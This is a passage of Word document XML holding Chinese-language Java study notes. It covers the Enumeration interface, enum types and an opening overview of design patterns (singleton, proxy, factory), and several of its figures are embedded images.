    </w:p>
    <w:p w:rsidR="00504C17" w:rsidRPr="00504C17" w:rsidRDefault="00504C17" w:rsidP="00504C17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>System.out.println(e.nextElement());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504C17" w:rsidRPr="00504C17" w:rsidRDefault="00504C17" w:rsidP="00504C17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这些方法主要通过向量的元素、哈希表的键以及哈希表中的值进行枚举。枚举也用于将输入流指定到</w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> SequenceInputStream </w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504C17" w:rsidRDefault="00504C17" w:rsidP="00504C17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：此接口的功能与</w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Iterator </w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>接口的功能是重复的。此外，</w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Iterator </w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>接口添加了一个可选的移除操作，并使用较短的方法名。</w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>新的实现应该优先考虑使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Iterator </w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>接口而不是</w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enumeration </w:t>
      </w:r>
      <w:r w:rsidRPr="00504C17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>接口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236E5A" w:rsidRPr="004B6128" w:rsidRDefault="00236E5A" w:rsidP="00504C17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B6128">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidR="00FD4358" w:rsidRPr="004B6128">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00FD4358" w:rsidRPr="004B6128">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:r w:rsidR="00FD4358" w:rsidRPr="004B6128">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>实现方式，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236E5A" w:rsidRPr="00504C17" w:rsidRDefault="00236E5A" w:rsidP="00504C17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3008317"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="28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cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3008317"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00504C17" w:rsidRPr="00504C17" w:rsidRDefault="00504C17" w:rsidP="00504C17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C452C2" w:rsidRPr="00C452C2" w:rsidRDefault="006F3FFD" w:rsidP="00DA285D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4718685" cy="2924175"/>
            <wp:effectExtent l="19050" t="0" r="5715" b="0"/>
            <wp:docPr id="28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cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4718685" cy="2924175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040622B" w:rsidRPr="00B50BC7" w:rsidRDefault="0040622B" w:rsidP="0040622B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.1.23.3 </w:t>
      </w:r>
      <w:r>
        <w:t>Enum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>枚举类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040622B" w:rsidRDefault="006A1D91" w:rsidP="00A23651">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2427504"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="29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cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2427504"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A830CD" w:rsidRDefault="00A830CD" w:rsidP="00A23651">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A830CD" w:rsidRDefault="00A830CD" w:rsidP="00A23651">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4862887" cy="3429026"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="29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2" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4863412" cy="3429396"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A830CD" w:rsidRDefault="00A830CD" w:rsidP="00A23651"/>
    <w:p w:rsidR="00A830CD" w:rsidRDefault="00A830CD" w:rsidP="00A23651">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2578261"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="30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3" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2578261"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB0EBD" w:rsidRDefault="00EB0EBD" w:rsidP="00EB0EBD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.2</w:t>
      </w:r>
      <w:r w:rsidR="00563FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设计模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE779B" w:rsidRDefault="00FE779B" w:rsidP="00FE779B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有涉及模式参考资料：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C87D16" w:rsidRDefault="00C87D16" w:rsidP="00FE779B">
      <w:r w:rsidRPr="00C87D16">
        <w:t>http://www.runoob.com/design-pattern/front-controller-pattern.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF381B" w:rsidRPr="00BF381B" w:rsidRDefault="00BF381B" w:rsidP="00BF381B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单例模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E348C" w:rsidRDefault="001E348C" w:rsidP="00125738">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单例模式：</w:t>
      </w:r>
      <w:r w:rsidR="0020689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DCL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF381B" w:rsidRPr="00BF381B" w:rsidRDefault="00BF381B" w:rsidP="00BF381B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00144FEF" w:rsidRDefault="00C21FE8" w:rsidP="00125738">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代理模式</w:t>
      </w:r>
      <w:r w:rsidR="001E348C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="002F6112">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="001E348C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pringAOP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF381B" w:rsidRPr="00BF381B" w:rsidRDefault="00BF381B" w:rsidP="00BF381B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工厂模式</w:t>
      </w:r>
      <w:r w:rsidR="00837301">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Factory Pattern)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A1392" w:rsidRPr="004A1392" w:rsidRDefault="004A1392" w:rsidP="004A1392">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004A1392">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>简单工厂又叫做</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA5AE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>静态工厂方法</w:t>
      </w:r>
      <w:r w:rsidRPr="004A1392">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="006025B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Static Factory Method</w:t>
      </w:r>
      <w:r w:rsidRPr="004A1392">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）模式，但不属于</w:t>
      </w:r>
      <w:r w:rsidRPr="004A1392">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidRPr="004A1392">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>种</w:t>
      </w:r>
      <w:r w:rsidRPr="004A1392">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GOF</w:t>
      </w:r>
      <w:r w:rsidRPr="004A1392">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设计模式之一。简单工厂模式的实质是由一个工厂类根据传入的参数，动态决定应该创建哪一个产品类。</w:t>
      </w:r>
      <w:r w:rsidRPr="004A1392">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="004A1392">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA5AE0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BeanFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="004A1392">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就是简单工厂模式的体现，根据传入一个唯一的标识来获得</w:t>
      </w:r>
      <w:r w:rsidRPr="004A1392">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r w:rsidRPr="004A1392">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象，但是否是在传入参数后创建还是传入参数前创建这个要根据具体情况来定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00016C9C" w:rsidRDefault="00016C9C" w:rsidP="00016C9C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>工厂方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00016C9C" w:rsidRDefault="00016C9C" w:rsidP="00016C9C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00016C9C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一抽象产品类派生出多个具体产品类；一抽象工厂类派生出多个具体工厂类；每个具体工厂类只能创建一个具体产品类的实例。即定义一个创建对象的接口（即抽象工厂类），让其子类（具体工厂类）决定实例化哪一个类（具体产品类）。“一对一”的关系。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00016C9C" w:rsidRDefault="00016C9C" w:rsidP="00016C9C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180"/>
        <w:ind w:firstLine="238"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4352348" cy="1235123"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
